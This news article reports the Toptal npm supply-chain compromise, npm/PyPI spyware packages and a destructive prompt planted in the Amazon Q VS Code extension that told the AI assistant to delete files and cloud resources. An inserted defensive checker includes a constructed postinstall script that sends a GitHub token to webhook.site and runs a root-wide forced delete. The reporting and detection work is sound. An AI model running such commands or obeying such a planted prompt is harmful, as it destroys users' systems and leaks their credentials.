Hackers Hit Toptal GitHub, Push 10 Malicious npm Packages with 5K Downloads

In the latest example of a software supply chain attack, unknown threat actors gained unauthorized access to Toptal's GitHub organization account. Using this access, they published ten malicious packages to the npm registry. 

According to a report by Socket, the malicious packages contained code designed to steal GitHub authentication tokens and destroy victim systems. Additionally, 73 repositories linked to the organization were made public. 

The affected packages include the following: 

  • @toptal/picasso-tailwind 
  • @toptal/picasso-charts 
  • @toptal/picasso-shared 
  • @toptal/picasso-provider 
  • @toptal/picasso-select 
  • @toptal/picasso-quote 
  • @toptal/picasso-forms 
  • @xene/core 
  • @toptal/picasso-utils 
  • @toptal/picasso-typograph 

Each of the Node.js packages carried the same malicious payload, placed in its package.json file. Together they were downloaded around 5,000 times before being removed from the registry. 

The malicious code was injected into the packages' preinstall and postinstall scripts, which npm runs automatically during installation. Its purpose was to send stolen GitHub authentication tokens to a webhook[.]site endpoint and then erase all files and directories on the infected system without any user interaction. The payload targeted both Windows and Linux, using commands such as "rm /s /q" or "sudo rm -rf --no-preserve-root /". 
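A defender-side check for the pattern just described, added here as an example and not code from Socket, Toptal or npm: it parses a package.json and flags install-time hooks that show the indicators above (a webhook.site callout, a token reference, a recursive delete). The two package.json samples are constructed; their names, versions and the webhook path are placeholders.

```javascript
// Added example (not Socket's, Toptal's or npm's code): audit the lifecycle hooks of a
// package.json for the indicators described above: install-time scripts that call out
// to webhook.site, reference GitHub tokens, or run destructive deletes.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

const INDICATORS = [  // pattern plus the reason it is reported
  { re: /webhook\.site/i, reason: "exfiltration endpoint (webhook.site)" },
  { re: /\b(curl|wget)\b[^&|;]*https?:\/\//i, reason: "outbound HTTP request from an install hook" },
  { re: /\brm\s+-[a-z]*(rf|fr)\b|--no-preserve-root/i, reason: "recursive forced delete (Linux/macOS)" },
  { re: /\brm(dir)?\s+\/s\s+\/q\b/i, reason: "recursive delete (Windows)" },
  { re: /\b(GITHUB_TOKEN|GH_TOKEN)\b|\.npmrc\b/i, reason: "token variable or credential file referenced" },
];

function auditPackageJson(jsonText) {
  const pkg = JSON.parse(jsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;  // hook not defined in this package
    for (const { re, reason } of INDICATORS) {
      if (re.test(command)) findings.push({ hook, reason, command });
    }
  }
  return { name: pkg.name, version: pkg.version, findings };
}

// Constructed samples modelled on the behaviour described above; the names, versions
// and webhook path are placeholders, not the real artefacts from the incident.
const MALICIOUS_PACKAGE_JSON = `{
  "name": "@example/sample-pkg", "version": "0.0.1",
  "scripts": {
    "preinstall": "node scripts/check-node-version.js",
    "postinstall": "curl -s -X POST https://webhook.site/PLACEHOLDER-ID -d token=$GH_TOKEN; sudo rm -rf --no-preserve-root /"
  }
}`;
const CLEAN_PACKAGE_JSON = `{
  "name": "@example/clean-pkg", "version": "1.2.3",
  "scripts": { "build": "tsc", "postinstall": "node ./scripts/patch.js" }
}`;

for (const text of [MALICIOUS_PACKAGE_JSON, CLEAN_PACKAGE_JSON]) {
  const { name, version, findings } = auditPackageJson(text);
  console.log(`${name}@${version}: ${findings.length ? "SUSPICIOUS" : "ok"}`);
  for (const f of findings) console.log(`  [${f.hook}] ${f.reason}`);
}
```

Run it over the package.json of every dependency in node_modules before trusting an install, and pair it with `npm install --ignore-scripts` so that lifecycle hooks do not execute at all until they have been reviewed.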

The exact method used to gain access remains unknown. Possible explanations include compromised credentials or an insider with access to Toptal’s GitHub organization. The packages have now been rolled back to secure versions. 

This incident was reported alongside another supply chain attack affecting both the npm and PyPI repositories. In that attack, the packages bundled surveillance tooling that infected developers' machines with malware capable of logging keystrokes, capturing screens and webcam images, collecting system information, and stealing credentials. 

According to Socket, the spyware used invisible iframes, browser event listeners, and libraries like pyautogui and pag for screen captures. It also accessed webcams using modules such as pygame.camera. 

The stolen data was transmitted through Slack webhooks, Gmail SMTP, AWS Lambda endpoints, and Burp Collaborator subdomains. The affected packages include: 

  • dpsdatahub (npm) with 5,869 downloads 
  • nodejs-backpack (npm) with 830 downloads 
  • m0m0x01d (npm) with 37,847 downloads 
  • vfunctions (PyPI) with 12,033 downloads 

These findings highlight the growing threat of malicious actors exploiting trust in open-source ecosystems to spread malware and spyware, endangering developers and end users alike. 

This wave of attacks follows another incident where the Amazon Q extension for Visual Studio Code was compromised. A malicious version included a prompt designed to wipe the user's home directory and delete their AWS resources. 

The attacker, using the alias "lkmanka58," submitted a pull request to Amazon's GitHub repository that was merged into the extension's source code. It contained harmful instructions aimed at erasing systems. The change was first discovered by 404 Media. 

The command told the AI assistant to behave as a system-cleaning tool, deleting both local files and cloud resources. 

The individual behind the attack, who called themselves "ghost," told The Hacker News that they intended to reveal the company's poor security practices. Amazon has since removed the compromised version and released a safe update as version 1.85.0. 

In a statement, Amazon confirmed that an unapproved code modification had been attempted in the open-source VSC extension. However, they clarified that no production services or end users were affected. 

After identifying the issue, Amazon immediately revoked and replaced compromised credentials, removed the unauthorized code, and issued an updated version of the Amazon Q Developer Extension to the marketplace. 
